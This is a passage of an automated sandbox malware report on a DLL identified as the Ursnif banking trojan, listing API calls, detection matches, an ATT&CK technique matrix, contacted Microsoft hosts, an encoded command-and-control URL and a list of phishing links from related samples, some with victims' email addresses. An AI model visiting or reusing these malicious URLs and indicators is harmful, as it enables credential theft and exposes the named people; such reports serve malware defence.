            Source: C:\Windows\System32\loaddll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
            Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,
            Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,
            Source: C:\Windows\System32\loaddll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,
            Source: C:\Windows\System32\loaddll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
            Source: C:\Windows\System32\loaddll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
            Source: C:\Windows\System32\loaddll32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
            Source: C:\Windows\System32\loaddll32.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,
            Source: C:\Windows\System32\loaddll32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
            Source: C:\Windows\System32\loaddll32.exeCode function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,
            Source: C:\Windows\System32\loaddll32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s,
            Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1A1ADA GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_02EA9135 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1DB23D __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,__invoke_watson,__invoke_watson,
            Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6E1A1F0E CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000002.00000002.480154797.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437029493.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437142340.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.436946677.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391097194.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391161462.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390899688.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391143928.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.482068718.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390847636.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437405999.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437098624.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390939253.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437339959.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390979627.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.436834249.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391054400.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437249428.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4796, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1844, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000002.00000002.480154797.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437029493.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437142340.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.436946677.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391097194.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391161462.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390899688.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391143928.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.482068718.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390847636.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437405999.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437098624.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390939253.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437339959.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.390979627.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.436834249.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.391054400.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.437249428.0000000005A38000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4796, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1844, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation2Path InterceptionProcess Injection12Masquerading1OS Credential DumpingSystem Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection12LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerSecurity Software Discovery11SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemFile and Directory Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery23Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 446420 Sample: c36.dll Startdate: 09/07/2021 Architecture: WINDOWS Score: 72 34 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->34 36 Found malware configuration 2->36 38 Yara detected  Ursnif 2->38 7 loaddll32.exe 1 2->7         started        10 iexplore.exe 2 83 2->10         started        process3 signatures4 40 Writes or reads registry keys via WMI 7->40 42 Writes registry values via WMI 7->42 12 rundll32.exe 7->12         started        15 rundll32.exe 7->15         started        17 cmd.exe 1 7->17         started        22 2 other processes 7->22 19 iexplore.exe 25 10->19         started        process5 dnsIp6 44 Writes registry values via WMI 12->44 24 WerFault.exe 23 9 15->24         started        26 rundll32.exe 17->26         started        28 outlook.com 40.97.128.194, 443, 49729, 49730 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 19->28 30 52.97.201.194, 443, 49734, 49735 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 19->30 32 5 other IPs or domains 19->32 signatures7 process8

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            c36.dll3%MetadefenderBrowse
            c36.dll14%ReversingLabsWin32.Trojan.Ursnif

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            5.2.rundll32.exe.1180000.1.unpack100%AviraHEUR/AGEN.1108168Download File
            2.2.loaddll32.exe.2ea0000.0.unpack100%AviraHEUR/AGEN.1108168Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.wikipedia.com/0%URL Reputationsafe
            http://www.wikipedia.com/0%URL Reputationsafe
            http://www.wikipedia.com/0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            outlook.com
            		40.97.128.194
            		truefalse
              		high
              ZRH-efz.ms-acdc.office.com
              		52.98.163.18
              		truefalse
                		high
                www.outlook.com
                		unknown
                		unknownfalse
                  		high
                  outlook.office365.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://outlook.com/jdraw/D_2BiqNvBbnsXvuMxmM/t9_2FNHkYnKYRDnfwXuIAV/PZdbgLkzH6hzl/QBVRJ_2F/gFwgPVc3A_2BGFDYWcxhxu6/95nq35D0eQ/F_2Bmi0291iuqGJ2R/Lk7llVNKTp1W/ZOLoPeu_2F4/nTZWoYdvVj3RXx/XwwFNQtzd_2FkWk0UpQTO/wz8fmYfCTc8Ok1p_/2Bs3Gpetltr/L74Ig5cboZ/m.crwfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.wikipedia.com/msapplication.xml6.24.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.amazon.com/msapplication.xml.24.drfalse
                        		high
                        http://www.nytimes.com/msapplication.xml3.24.drfalse
                          		high
                          https://outlook.office365.com/jdraw/D_2BiqNvBbnsXvuMxmM/t9_2FNHkYnKYRDnfwXuIAV/PZdbgLkzH6hzl/QBVRJ_2{6C6C1DAB-E104-11EB-90E4-ECF4BB862DED}.dat.24.drfalse
                            		high
                            http://www.live.com/msapplication.xml2.24.drfalse
                              		high
                              http://www.reddit.com/msapplication.xml4.24.drfalse
                                		high
                                http://www.twitter.com/msapplication.xml5.24.drfalse
                                  		high
                                  http://www.youtube.com/msapplication.xml7.24.drfalse
                                    		high

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    40.97.128.194
                                    		outlook.comUnited States
                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                    52.97.201.194
                                    		unknownUnited States
                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                    52.98.163.18
                                    		ZRH-efz.ms-acdc.office.comUnited States
                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                    General Information

                                    Joe Sandbox Version:32.0.0 Black Diamond
                                    Analysis ID:446420
                                    Start date:09.07.2021
                                    Start time:15:22:18
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 9m 45s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:c36.dll
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:34
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal72.troj.winDLL@17/18@3/3
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 15.1% (good quality ratio 14.3%)
                                    • Quality average: 79.2%
                                    • Quality standard deviation: 28.9%
                                    HCA Information:
                                    • Successful, ratio: 80%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .dll
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, ielowutil.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 104.42.151.234, 13.88.21.125, 23.54.113.53, 52.147.198.201, 52.255.188.83, 95.100.54.203, 104.43.139.144, 13.64.90.137, 20.82.210.154, 2.18.105.186, 20.82.209.183, 152.199.19.161, 23.10.249.43, 23.10.249.26
                                    • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ie9comview.vo.msecnd.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, cs9.wpc.v0cdn.net
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/446420/sample/c36.dll

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    15:24:11API Interceptor1x Sleep call for process: loaddll32.exe modified
                                    15:24:51API Interceptor1x Sleep call for process: WerFault.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    40.97.128.194http://outlook.com/owa/airmasteraustralia.onmicrosoft.comGet hashmaliciousBrowse
                                    • outlook.com/owa/airmasteraustralia.onmicrosoft.com

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    outlook.comoEE058tCoG.exeGet hashmaliciousBrowse
                                    • 40.93.207.1
                                    2Bmv1UZL2m.exeGet hashmaliciousBrowse
                                    • 52.101.24.0
                                    oS4iWYYsx7.exeGet hashmaliciousBrowse
                                    • 104.47.53.36
                                    P4SRvI1baM.exeGet hashmaliciousBrowse
                                    • 104.47.54.36
                                    051y0i7M8q.exeGet hashmaliciousBrowse
                                    • 40.93.207.0
                                    lEbR9gFgLr.exeGet hashmaliciousBrowse
                                    • 104.47.54.36
                                    0OvBoFRzgC.exeGet hashmaliciousBrowse
                                    • 104.47.54.36
                                    A1qhcbngFV.exeGet hashmaliciousBrowse
                                    • 104.47.54.36
                                    ZRH-efz.ms-acdc.office.comSigned pages of agreement copy.htmlGet hashmaliciousBrowse
                                    • 52.97.232.194
                                    PI_DRAFT.exeGet hashmaliciousBrowse
                                    • 52.97.186.114
                                    moog_invoice_Wednesday 02242021._xslx.hTMLGet hashmaliciousBrowse
                                    • 52.97.201.210
                                    https://app.box.com/s/yihmp2wywbz9lgdbg26g3tc1piwkalabGet hashmaliciousBrowse
                                    • 52.97.232.210
                                    http://resa.credit-financebank.com/donc/dcn/?email=bWNnaW5udEByZXNhLm5ldA==Get hashmaliciousBrowse
                                    • 52.97.201.242
                                    https://loginpro-288816.ew.r.appspot.com/#joshua.kwon@ttc.caGet hashmaliciousBrowse
                                    • 52.97.186.98
                                    http://YUEipfm.zackgillum.com/%40120%40240%40#james.kelsaw@puc.texas.govGet hashmaliciousBrowse
                                    • 52.97.232.194
                                    https://microsoft-quarantine.df.r.appspot.com/Get hashmaliciousBrowse
                                    • 52.97.232.194
                                    https://storage.googleapis.com/atotalled-370566990/index.htmlGet hashmaliciousBrowse
                                    • 52.97.186.18
                                    https://login-microsoft-office365-auth.el.r.appspot.com/login.microsoftonline.com/common/oauth2/authorize=vNews2&email=microsoftonline.com/common/oauth2/authorize&hashed_email=Y7XY6XCZJ3R4T4MN&utm_campaign=phx_trigger_uk_pop_email4&utm_source=photobox&utm_medium=email&uid=4978854645473&brandName=Photobox#helen@rhdb.com.auGet hashmaliciousBrowse
                                    • 52.97.232.242
                                    https://clicktime.symantec.com/3LNDmLN9vLnK1LqGUDBbkAD6H2?u=https%3A%2F%2Foutlook.office.com%2Fmail%2Fsearch%2Fid%2Fnscglobal.comGet hashmaliciousBrowse
                                    • 52.97.232.226
                                    https://luminous-cubist-288118.df.r.appspot.com/#lilja.b.einarsdottir@landsbankinn.isGet hashmaliciousBrowse
                                    • 52.97.232.226
                                    https://u4882271.ct.sendgrid.net/ls/click?upn=YFyCGXB2k7XEs51EAWvRp-2BQ6xaP5-2Bxv1vyI4sITyTp6VhtJSyiu7Ungt4CUf7KdGeEBPZ7lJ0WMtGrW3-2F8wXB5kIqpkSCZwccYVceognA2U-3D57Rw_kfZ8cLppmcXDuIHKWdMrLPt30SkBa8ipQz83IjjYGp9c2flQixqYXWN470AqCFO8g1yhSwMHhN8-2BJK0vTLNC61PkTeWIrAs821yYsBfCbuclR33OfNLncv-2FtXraICcEYo4WPVv8iupWN7r8K4Ld3UpsglQggrT98vACCXZNhqlBcQYKLRD-2BBljUb02MnMpFHKiH9-2BP5uH3bAOFC4VOgSpVi86N1p2cxRMZF5Xkh4ZdU-3DGet hashmaliciousBrowse
                                    • 52.97.186.114
                                    https://share-ointonlinekcjl5cj5k.et.r.appspot.com/#I.Artolli@sbm.mcGet hashmaliciousBrowse
                                    • 52.97.186.18
                                    Fund Transfer PDF.htmGet hashmaliciousBrowse
                                    • 52.97.232.194
                                    http://outlook.com/owa/airmasteraustralia.onmicrosoft.comGet hashmaliciousBrowse
                                    • 52.97.232.226
                                    http://portal.payrolltooling.net/?id=vpqyydl7ZnKtU4usMGPqUQPtxkGlU49Be%2BH%2BAigE5ucTWat3Eej8US2xdckdOu0iDpwQIwMYKl9DLP2pKOIwIWa7isWu4stPeMJ%2BbSSC%2BrsVtg8U%2BWD1tF4Bc3%2FtEr3hJI4S3OomSDlwnU2PwUDgbmdkRVrT8Jiy8Xe4bfQ0dyp5k2o%2Bf2eztEQzNsZlKz0xjWSRZcdjYCg9vWmNNNSvSwsWNybr8UBeONKYmj4PdCOwhNBWdvur%2BK4Wx1bqcPE26q7z8kpyQ4hJ2vOCvXmdlnZ37w0%2BAGvM3H2V03OaxIsBHrlCuyiPhQWq8qdKOB4lg1EmFibK759dnK%2FawF2z6INf5IJhbtrbLVkWA6i%2FuckBPOJvVXHWYj5SHhB8X%2FZzGet hashmaliciousBrowse
                                    • 52.97.232.194
                                    okayfreedomwr.exeGet hashmaliciousBrowse
                                    • 52.97.232.194
